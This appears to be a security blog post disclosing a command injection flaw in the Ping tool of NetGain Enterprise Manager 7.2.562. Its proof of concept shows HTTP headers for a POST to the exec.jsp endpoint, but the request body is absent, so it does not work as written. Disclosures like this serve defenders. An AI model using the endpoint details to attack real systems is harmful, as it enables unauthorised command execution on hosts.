NetGain Enterprise Manager: 'Ping' Command Injection - Spentera Blog

NetGain Enterprise Manager: ‘Ping’ Command Injection

by MrChaZ / March 13, 2017

We discovered a vulnerability on NetGain Enterprise Manager (ver. 7.2.562) during a pentest. We believe that this vulnerability is quite rare and worth to share.


Command injection is an attack in which the purpose is execution of arbitrary commands on the host operating system via a vulnerable application.

Vulnerable Menu:

Tools – Ping

Proof of Concept:

POST /u/jsp/tools/exec.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 97
Cookie: JSESSIONID=542B58462355E4E3B99FAA42842E62FF
Connection: close
Pragma: no-cache
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 70
Date: Thu, 23 Feb 2017 13:27:40 GMT
Connection: close

Leave a Comments

Your email address will not be published. Required fields are marked *